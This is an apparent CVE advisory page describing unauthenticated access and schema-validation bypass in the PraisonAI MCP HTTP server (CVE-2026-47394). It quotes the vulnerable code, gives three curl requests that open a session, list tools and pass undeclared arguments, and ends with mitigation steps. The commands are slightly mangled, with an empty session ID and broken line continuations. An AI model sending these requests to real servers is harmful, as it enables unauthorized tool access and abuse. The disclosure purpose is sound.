PraisonAI, MCP HTTP Server, CVE-2026-47394 (Medium-High) -DC-Oct2026-2978

Listen to this Post

The vulnerability in PraisonAI stems from an unauthenticated MCP HTTP-stream server design where security controls are entirely opt-in. Specifically, when the service is launched via the command-line interface using default configurations, the API key defaults to None, leaving authentication checks completely bypassed for incoming HTTP requests. Furthermore, the origin verification mechanism permits missing Origin headers, allowing non-browser clients such as curl or automated testing suites to interact with the server unhindered. When requests reach the server, the dispatcher initializes sessions and enumerates approximately fifty available tools without requiring validation tokens. Additionally, tool-call arguments are forwarded directly to underlying handlers without enforcing validation against the advertised inputSchema. Consequently, attackers can interact with the Model Context Protocol surface, list tools, and supply undeclared parameters that bypass schema enforcement layers entirely, presenting significant risks regarding tool enumeration and unauthorized parameter manipulation.

DailyCVE Form:

Platform: PraisonAI
Version: 4.6.63
Vulnerability : Unauthenticated MCP Access
Severity: Medium-High
date: 2026-05-18

Prediction: 2026-06-01

What Undercode Say

The underlying issue stems from conditional authentication checks tied directly to the presence of an API key configuration. Because the default CLI parameters initialize without enforcing credentials or strict request origin rules, the transport layer accepts arbitrary unauthenticated connections. Below are the key commands and code references demonstrating how the vulnerability behaves and how requests target the server environment.

bash

praisonai mcp serve –transport http-stream

python

Vulnerable auth check snippet in http_stream.py

if self.api_key:

auth_header = request.headers.get(“Authorization”, “”)

if not auth_header.startswith(“Bearer “) or auth_header[7:] != self.api_key:

return JSONResponse({“error”: “Unauthorized”}, status_code=401)

python

Unvalidated arguments dispatcher snippet in server.py

result = await tool.handler(arguments)

Exploit: (Educational Purposes!)

To reproduce and verify the unauthenticated behavior against a local runtime instance running on loopback, an attacker or security auditor can issue direct HTTP requests without supplying any authorization headers or tokens.

bash

Step 1: Initialize MCP session without credentials

curl -X POST http://127.0.0.1:18090/mcp
-H “Accept: application/json”
-H “Content-Type: application/json”
-d ‘{“method”: “initialize”}’
Step 2: Enumerate available tools using the returned session ID
curl -X POST http://127.0.0.1:18090/mcp
-H “Accept: application/json”
-H “Content-Type: application/json”
-H “Mcp-Session-Id: ”
-d ‘{“method”: “tools/list”}’

Step 3: Trigger schema bypass with undeclared parameters

curl -X POST http://127.0.0.1:18090/mcp
-H “Accept: application/json”
-H “Content-Type: application/json”
-H “Mcp-Session-Id: ”
-d ‘{“method”: “tools/call”, “params”: {“name”: “example_tool”, “arguments”: {“undeclared_evil_param”: “test”}}}’

Protection: from this CVE

Mitigating this vulnerability requires ensuring that all server deployments enforce mandatory authentication tokens rather than relying on default open parameters. Operators must explicitly supply a secure API key parameter upon startup and ensure schema validation is rigorously enforced at the dispatcher layer before passing arguments to underlying handlers. Upgrading to patched versions where authentication is enforced by default resolves the exposure.

bash

praisonai mcp serve –transport http-stream –api-key YOUR_SECURE_API_KEY

Impact

The flaw allows unauthenticated attackers or local multi-user processes to perform full tool enumeration and invoke tool-end points without valid credentials. While specific file read vectors or remote code execution primitives may be constrained or runtime-refuted depending on adapter implementations, the exposure still opens vectors for resource abuse, cost inflation, and unauthorized data access across exposed agent tools.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top